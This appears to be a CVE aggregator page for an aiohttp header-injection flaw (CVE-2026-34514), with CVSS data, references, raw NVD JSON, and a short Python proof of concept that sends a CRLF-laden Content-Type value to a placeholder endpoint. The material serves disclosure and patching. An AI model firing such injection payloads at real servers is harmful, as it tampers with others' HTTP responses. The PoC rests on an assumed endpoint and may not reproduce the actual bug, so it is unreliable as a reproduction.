CVE-2026-34514

Description

AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to version 3.13.4, an attacker who controls the content_type parameter in aiohttp could use this to inject extra headers or similar exploits. This issue has been patched in version 3.13.4.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:aiohttp:aiohttp:*:*:*:*:*:*:*:* - VULNERABLE

aiohttp < 3.13.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import aiohttp
import asyncio

# PoC for HTTP Header Injection in aiohttp < 3.13.4
# This script demonstrates how a crafted Content-Type can inject headers.

async def main():
    url = 'http://vulnerable-endpoint/api'
    # Injecting CRLF characters (%0d%0a) to add a new header
    malicious_content_type = 'text/plain\r\nX-Injected-Header: POC-Value\r\nX-Another-Header: Test'
    
    headers = {
        'User-Agent': 'PoC-Scanner',
    }
    
    # Assuming the endpoint takes 'content_type' as a query or body parameter
    # and passes it unsanitized to the response headers.
    params = {
        'content_type': malicious_content_type
    }

    async with aiohttp.ClientSession() as session:
        try:
            async with session.get(url, params=params, headers=headers) as resp:
                print(f"Status: {resp.status}")
                print(f"Response Headers: {resp.headers}")
                # Check if the injected header is present in the response
                if 'X-Injected-Header' in resp.headers:
                    print("[+] Vulnerability Confirmed: Header injected successfully!")
                else:
                    print("[-] Vulnerability not detected or patched.")
        except Exception as e:
            print(f"Error: {e}")

if __name__ == '__main__':
    asyncio.run(main())

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34514
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34514
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34514/
[4] VulDB https://vuldb.com/cve/CVE-2026-34514
[5] https://github.com/aio-libs/aiohttp/commit/9a6ada97e2c6cf1ce31727c6c9fcea17c21f6f06
[6] https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4
[7] https://github.com/aio-libs/aiohttp/security/advisories/GHSA-2vrm-gr82-f7m5

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34514", "sourceIdentifier": "[email protected]", "published": "2026-04-01T21:16:59.417", "lastModified": "2026-04-15T14:13:42.230", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to version 3.13.4, an attacker who controls the content_type parameter in aiohttp could use this to inject extra headers or similar exploits. This issue has been patched in version 3.13.4."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-113"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aiohttp:aiohttp:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.13.4", "matchCriteriaId": "7B8B1C30-52F7-467A-A7D0-F6A786E84AF9"}]}]}], "references": [{"url": "https://github.com/aio-libs/aiohttp/commit/9a6ada97e2c6cf1ce31727c6c9fcea17c21f6f06", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-2vrm-gr82-f7m5", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}